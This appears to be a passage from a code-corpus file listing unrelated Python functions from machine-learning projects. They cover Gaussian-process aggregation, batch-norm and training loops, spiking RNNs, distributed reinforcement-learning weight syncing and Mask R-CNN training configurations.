method='PoE', weighting='uniform', power=26):\n\n nt = xt_s.shape[0]\n mu = np.zeros([nt, self.C],dtype='float64')\n var = np.zeros([nt, self.C],dtype='float64')\n\n prior_var = self.experts[0].kernel(xt_s[0], xt_s[0])\n\n \n #Process each latent gp individually \n for j in range(self.C):\n \n mu_s_c = mu_s[:, :, j]\n var_s_c = var_s[:, :, j]\n \n weight_matrix = compute_weights(mu_s_c, var_s_c, power, weighting, prior_var)\n \n prec_s= 1/var_s_c\n\n if method == 'PoE':\n \n prec = tf.reduce_sum(prec_s, axis=0)\n \n\n if method == 'gPoE':\n \n weight_matrix = normalize_weights(weight_matrix)\n\n prec = tf.reduce_sum(weight_matrix * prec_s , axis=0)\n \n\n if method == 'BCM':\n \n prec = tf.reduce_sum(prec_s, axis=0) + (1 - self.M) / prior_var \n\n if method == 'rBCM':\n \n \n prec = tf.reduce_sum(weight_matrix * prec_s, axis=0) \\\n + (1 - tf.reduce_sum(weight_matrix, axis=0)) / prior_var\n \n \n \n if method != 'bar':\n \n var[:, j] = 1 / prec\n\n mu[:, j] = var[:, j] * tf.reduce_sum(weight_matrix * prec_s * mu_s_c, axis=0)\n \n else:\n \n weight_matrix = normalize_weights(weight_matrix)\n\n mu[:, j] = tf.reduce_sum(weight_matrix * mu_s_c, axis=0)\n var[:, j] = tf.reduce_sum(weight_matrix * var_s_c, axis=0)\n \n \n return self.lik_aggregation(mu, var)", "def spatial_batchnorm_forward(x, gamma, beta, bn_param):\n out, cache = None, None\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out, cache", "def stats(self):\n remaining_params, total_params = 0, 0 \n for mask, _ in self.masked_parameters:\n remaining_params += mask.detach().cpu().numpy().sum()\n total_params += mask.numel()\n return remaining_params, total_params", "def update_net(optimizer):\n assert kl_train_dataset.bp_mode\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = kl_train_dataset[index]\n\n optimizer.zero_grad()\n \n num_crop = 1\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crop * 3, 224, 224]\n assert len(frames) == length * frame_cnt\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda())\n base_out = net(input_var, None, None, None, None)\n assert base_out.size(0) == frame_cnt and base_out.size(1) == base_out_dim\n step_features = base_out.mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n gate = gate.repeat(1, frame_cnt).view(frame_cnt, base_out_dim)\n assert glcu_task_pred.size(0) == 1\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0)\n if net.additive_glcu:\n base_out = base_out + gate\n else:\n base_out = base_out * gate\n\n output = net.test_fc(base_out)\n assert output.size(0) == frame_cnt and output.size(1) == output_dim\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling, bp_mode=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], 
dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = net.task_head(combined_scores)\n assert task_pred.size(0) == 1\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0)\n\n loss = KL(task_pred, glcu_task_pred)\n loss.backward()\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n break\n\n optimizer.step()\n optimizer.zero_grad()\n torch.cuda.empty_cache()\n\n return float(loss.data), frame_cnt", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(gp.input_dim, anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, gp.input_dim)))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1, model='resnet50', distortions=False, forward_only=True)", "def main(args):\n gt_path = args.ground_truth\n djdd_path = args.djdd\n bjdd_path = args.bjdd\n\n mse_fn = th.nn.MSELoss()\n psnr_fn = PSNR()\n\n device = \"cpu\"\n # if th.cuda.is_available():\n # device = \"cuda\"\n\n pdf = pd.DataFrame(columns=[\"filename\",\"imgid\", \"PSNR_for_DJDD\", \"MSE_for_DJDD\", \"PSNR_for_BJDD\", \"MSE_for_BJDD\"])\n\n count = 0\n msedjdd = 0.0\n psnrdjdd = 0.0\n\n msebjdd = 0.0\n psnrbjdd = 0.0\n\n for root, _, files in os.walk(gt_path):\n for idx, name in enumerate(files):\n \n # djdd image\n output_djdd = np.array(imread(os.path.join(djdd_path, name+\"_0_output.png\"))).astype(np.float32) / (2**8-1)\n output_djdd = th.from_numpy(np.transpose(output_djdd, [2,0,1])).to(device).unsqueeze(0)\n\n #bjdd image\n output_bjdd = np.array(imread(os.path.join(bjdd_path, name.split('.')[0]+\"_sigma_0_bayer_PIPNet.png\"))).astype(np.float32) / (2**8-1)\n output_bjdd = th.from_numpy(np.transpose(output_bjdd, [2,0,1])).to(device).unsqueeze(0)\n\n # gt image\n target = np.array(imread(os.path.join(root, name))).astype(np.float32) / (2**8-1)\n target = th.from_numpy(np.transpose(target, [2, 0, 1])).to(device).unsqueeze(0)\n\n\n target_djdd = crop_like(target, output_djdd)\n target_bjdd = crop_like(target, output_bjdd)\n\n psnr_djdd = psnr_fn(output_djdd, target_djdd).item()\n mse_djdd = mse_fn(output_djdd, target_djdd).item()\n\n psnr_bjdd = psnr_fn(output_bjdd, target_bjdd).item()\n mse_bjdd = mse_fn(output_bjdd, target_bjdd).item()\n\n psnrdjdd += psnr_djdd\n msedjdd += mse_djdd\n psnrbjdd += psnr_bjdd\n msebjdd += mse_bjdd\n\n count += 1\n\n LOG.info(f\"imgid: {idx}, 
PSNR_BJDD: {psnr_bjdd}, MSE_BJDD: {mse_bjdd}, PSNR_DJDD: {psnr_djdd}, MSE_DJDD: {mse_djdd}\")\n pdf = pdf.append({\n \"filename\": name,\n \"imgid\": idx,\n \"PSNR_for_DJDD\": psnr_djdd,\n \"MSE_for_DJDD\": mse_djdd,\n \"PSNR_for_BJDD\": psnr_bjdd,\n \"MSE_for_BJDD\": mse_bjdd\n }, ignore_index=True)\n # pdb.set_trace()\n\n msebjdd /= count\n psnrbjdd /= count\n\n msedjdd /= count\n psnrdjdd /= count\n\n LOG.info(\"--------------BJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrbjdd, msebjdd)\n\n LOG.info(\"--------------DJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrdjdd, msedjdd)\n pdb.set_trace()\n pdf.to_csv(\"/workspace/presentation_compare.csv\")", "def update_network(self):\n\n device = torch.device(\"cpu\")\n self.model = ProLoNet(input_dim=13,\n weights=None,\n comparators=None,\n leaves=32,\n output_dim=1,\n bayesian_embedding_dim=8,\n alpha=1.5,\n use_gpu=False,\n vectorized=True,\n is_value=True).to(device)\n\n self.embedding_optimizer = torch.optim.RMSprop([{'params': self.model.bayesian_embedding.parameters()}], lr=.1)\n self.embedding_list = [torch.ones(3) * 1 / 3 for i in range(2000)]\n self.opt = torch.optim.RMSprop(\n [{'params': list(self.model.parameters())[:-1]}, {'params': self.model.bayesian_embedding.parameters(), 'lr': .01}], lr=.01)\n\n criterion = torch.nn.BCELoss()\n\n n_epochs = 4000 + self.global_schedule_num * 3\n for epoch in range(n_epochs):\n which_schedule = np.random.randint(len(self.data_so_far))\n timestep_within_schedule = np.random.randint(len(self.teacher_actions[which_schedule]))\n\n index_within_network_state = timestep_within_schedule * 20\n timestep_data_from_agg = self.data_so_far[which_schedule][index_within_network_state:index_within_network_state+20]\n task = self.teacher_actions[which_schedule][timestep_within_schedule]\n # set the embedding\n self.model.set_bayesian_embedding(self.embedding_list[which_schedule].clone())\n # update loop\n\n phi_i_num = task\n phi_i = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, phi_i_num)\n phi_i_numpy = np.asarray(phi_i)\n loss_counter = 0\n # iterate over pairwise comparisons\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_i_numpy - phi_j_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.ones((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.ones((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model(feature_input))\n loss = criterion(output, label)\n # prepare optimizer, compute gradient, update params\n loss_counter += loss.item()\n self.opt.zero_grad()\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_j_numpy - phi_i_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.zeros((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = 
Variable(torch.Tensor(torch.zeros((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model.forward(feature_input))\n\n self.opt.zero_grad()\n loss = criterion(output, label)\n loss_counter += loss.item()\n\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n self.loss_array.append(loss_counter / 38)\n self.embedding_list[which_schedule] = torch.Tensor(self.model.get_bayesian_embedding().detach().cpu().numpy()).clone() # very ugly", "def rnn_cell_loop(self):\n\n\t\t# Set up initial state\n\t\tself.h_out = [tf.zeros([par['batch_size'],par['n_hidden']])]\t\t\t# Spike\n\t\tself.h = tf.ones([par['batch_size'],par['n_hidden']])\t\t\t\t\t# State\n\t\tself.h *= 0.1 if par['cell_type'] == 'rate' else par[par['cell_type']]['V_r']\n\t\tself.h = [self.h]\n\t\tadapt = par['w_init']*tf.ones([par['batch_size'],par['n_hidden']])\n\n\t\tsyn_x = par['syn_x_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\t\tsyn_u = par['syn_u_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\n\t\t# Apply the EI mask to the recurrent weights\n\t\tself.W_rnn_effective = par['EI_matrix'] @ tf.nn.relu(self.var_dict['W_rnn'])\n\n\t\t# Set up latency buffer if being used\n\t\tif par['use_latency']:\n\t\t\tself.state_buffer = [tf.zeros([par['batch_size'], par['n_hidden']]) for t in range(par['latency_max'])]\n\t\t\tself.state_buffer = deque(self.state_buffer)\n\t\t\tself.W_rnn_latency = self.W_rnn_effective[tf.newaxis,...] * par['latency_mask']\n\t\t\tself.lat_spike_shape = tf.ones([par['latency_max'], 1, 1])\n\n\t\t# Set up output record\n\t\tself.output = []\n\t\tself.syn_x = []\n\t\tself.syn_u = []\n\n\t\ty = 0.\n\t\tfor t in range(par['num_time_steps']):\n\t\t\tself.t = t \t\t# For latency calculations\n\n\t\t\tif par['cell_type'] == 'rate':\n\t\t\t\traise Exception('Rate cell not yet implemented.')\n\t\t\telif par['cell_type'] == 'adex':\n\t\t\t\tif t < 10:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(tf.zeros_like(self.h_out[-1]), self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\telse:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(self.h_out[-10], self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*(spike @ self.var_dict['W_out'] + self.var_dict['b_out'])\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\t\t\t\tself.syn_x.append(syn_x)\n\t\t\t\tself.syn_u.append(syn_u)\n\n\t\t\telif par['cell_type'] == 'lif':\n\t\t\t\tspike, state, adapt, syn_x, syn_u = self.LIF_cell(self.h_out[-1], self.h[-1], adapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*spike @ self.var_dict['W_out'] + 0.*self.var_dict['b_out']\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\n\t\t# Stack records\n\t\tself.output = tf.stack(self.output, axis=0)\n\t\tself.h = tf.stack(self.h, axis=0)\n\t\tself.h_out = tf.stack(self.h_out, axis=0)\n\t\tself.syn_x = tf.stack(self.syn_x, axis=0)\n\t\tself.syn_u = tf.stack(self.syn_u, axis=0)", "def compute_status(self, net_output, gts):\n # setting prob_list and probs as None\n self.probs = None\n self.prob_list = None\n\n logit_list = net_output[0]\n self.compute_top1_accuracy(logit_list, gts)\n self.compute_oracle_accuracy(logit_list, gts)\n self.compute_confusion_matrix(logit_list, gts)\n\n self.attach_predictions()\n self.attach_assignments(gts)", "def process(self, sess):\n 
global send_counter\n \n #sess.run(self.sync) # copy weights from shared to local\n rollout = self.pull_batch_from_queue()\n batch = process_rollout(rollout, gamma=0.99, lambda_=1.0)\n\n should_compute_summary = self.task == 0 and self.local_steps % 11 == 0\n\n if should_compute_summary:\n fetches = [self.summary_op, self.train_op]\n else:\n fetches = [self.train_op]\n\n\n feed_dict = {\n self.local_network.x: batch.si,\n self.ac: batch.a,\n self.adv: batch.adv,\n self.r: batch.r,\n self.local_network.state_in[0]: batch.features[0],\n self.local_network.state_in[1]: batch.features[1],\n }\n\n # Get current trainable variables\n # This is trainable variables\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n\n if self.num_workers > 1:\n sys.stdout.write('\\r' + str(self.local_steps))\n if self.local_steps % 100 == 0:\n global var0\n global var1\n var1 = sess.run(self.local_network.var_list) # After training\n if var0 != None:\n var_diff = [a - b for (a,b) in zip(var1, var0)]\n var_diff_data = pickle.dumps(var_diff, -1)\n print('Sync weights')\n self.msg_sent = socket_util.socket_send_data_chucks(self.sock, var_diff_data, self.mcast_destination, self.msg_sent)\n var0 = sess.run(self.local_network.var_list) # A list of numpy array\n\n # Handle each message in the socket queue\n while not self.inc_msg_q.empty():\n print('Apply remote gradients')\n # Process received grads_and_vars from other peers\n remote_var_diff_data = self.inc_msg_q.get(False)\n remote_var_diff = pickle.loads(remote_var_diff_data)\n\n add_op = [a+b for (a,b) in zip(self.local_network.var_list, remote_var_diff)]\n sess.run(add_op)\n\n if should_compute_summary:\n self.summary_writer.add_summary(tf.Summary.FromString(fetched[0]))\n self.summary_writer.flush()\n self.local_steps += 1", "def __call__(self, initial_state, previous_alignments):\n with tf.variable_scope(None, \"rnn_score_attention\", [initial_state]):\n score, final_state = rnn_score(initial_state, self._keys, self._cell, self._memory_sequence_length)\n alignments = self._probability_fn(score, previous_alignments)\n return alignments, final_state", "def main(Args):\n norm = [1.9844158727667542, 413.83759806375525,\n 51.2789974336363, 1038.4760551905683]\n input_pull = False\n input_model_mapping = False\n max_number = 2\n count = 40000\n catalog_name = os.path.join(DATA_PATH, 'OneDegSq.fits')\n # Define parameters for mrcnn model with btk here\n resid_model = btk_utils.Resid_btk_model(\n Args.model_name, Args.model_path, MODEL_DIR, training=True,\n images_per_gpu=4, validation_for_training=True)\n # Load parameters for dataset and load model\n resid_model.config.WEIGHT_DECAY = 0.001\n resid_model.config.STEPS_PER_EPOCH = 1000\n resid_model.config.VALIDATION_STEPS = 20\n sampling_function = None\n layers = 'all'\n if Args.model_name == 'model1':\n resid_model.config.BACKBONE = 'resnet41'\n elif Args.model_name == 'model2':\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model3':\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 
64)\n elif Args.model_name == 'model5':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet35'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4_large':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = '4+' # '3+'\n elif Args.model_name == 'model6':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 51.2789974336363, 1038.4760551905683]\n input_pull = True\n elif Args.model_name == 'model7':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model8': # stretch = 0.1, Q = 3\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model9': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] 
# [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again3': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model12': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n elif Args.model_name == 'model12_again': # stretch = 2000, Q = 0.5 # larger learning rate\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] 
# [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 10 # changed from 6 to 10 for run 4\n elif Args.model_name == 'model12_again2': # stretch = 2000, Q = 0.5 # larger learning rate val set reduced to 10\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n resid_model.config.VALIDATION_STEPS = 10\n else:\n raise AttributeError(\"model not found\", Args.model_name)\n print(\"Train in model:\", Args.model_name)\n resid_model.config.display()\n resid_model.make_resid_model(catalog_name, count=count,\n max_number=max_number, augmentation=True,\n norm_val=norm, input_pull=input_pull,\n sampling_function=sampling_function,\n input_model_mapping=input_model_mapping)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs,\n layers=layers)\n name = Args.model_name + '_run2'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs + 10)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs+10,\n layers=layers)\n name = Args.model_name + '_run3'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)", "def worker(self, gpu_id: int):\n if self.seed is not None:\n make_deterministic(self.seed)\n self.current_rank = self.rank\n if self.distributed:\n if self.multiprocessing:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n self.current_rank = self.rank * self.ngpus_per_node + gpu_id\n dist.init_process_group(\n backend=self.dist_backend,\n init_method=self.dist_url,\n world_size=self.world_size,\n rank=self.current_rank\n )\n # set up process logger\n self.logger = logging.getLogger(\"worker_rank_{}\".format(self.current_rank))\n self.logger.propagate = False\n handler = QueueHandler(self.logger_queue)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.INFO)\n\n # only write in master process\n if self.current_rank == 0:\n self.tb_writer = self.tb_writer_constructor()\n\n self.logger.info(\n \"Use GPU: %d for training, current rank: %d\",\n gpu_id,\n self.current_rank\n )\n # get dataset\n train_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"train\"\n )\n val_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"val\"\n )\n # create model\n self.model = get_model(\n model_name=self.global_cfg[\"model\"][\"name\"],\n num_classes=self.global_cfg[\"dataset\"][\"n_classes\"]\n )\n\n self.device = torch.device(\"cuda:{}\".format(gpu_id))\n self.model.to(self.device)\n\n batch_size = self.global_cfg[\"training\"][\"batch_size\"]\n n_workers = self.global_cfg[\"training\"][\"num_workers\"]\n if self.distributed:\n batch_size = int(batch_size / self.ngpus_per_node)\n n_workers = int((n_workers + self.ngpus_per_node - 1) / 
self.ngpus_per_node)\n if self.global_cfg[\"training\"][\"sync_bn\"]:\n self.model = SyncBatchNorm.convert_sync_batchnorm(self.model)\n self.model = DistributedDataParallel(self.model, device_ids=[gpu_id])\n self.logger.info(\"batch_size: {}, workers: {}\".format(batch_size, n_workers))\n\n # define loss function (criterion) and optimizer\n self.loss_fn = CrossEntropyLoss().to(self.device)\n\n optimizer_cls = get_optimizer(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params = copy.deepcopy(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params.pop(\"name\")\n self.optimizer: Optimizer = optimizer_cls(self.model.parameters(), **optimizer_params)\n self.logger.info(\"Loaded optimizer:\\n%s\", self.optimizer)\n\n # scheduler\n self.scheduler = get_scheduler(self.optimizer, self.global_cfg[\"training\"][\"lr_schedule\"])\n\n if self.distributed:\n train_sampler = DistributedSampler(\n train_dataset,\n shuffle=True,\n drop_last=True\n )\n val_sampler = DistributedSampler(\n val_dataset,\n shuffle=False\n )\n else:\n train_sampler = RandomSampler(train_dataset)\n val_sampler = SequentialSampler(val_dataset)\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=train_sampler\n )\n\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=val_sampler\n )\n 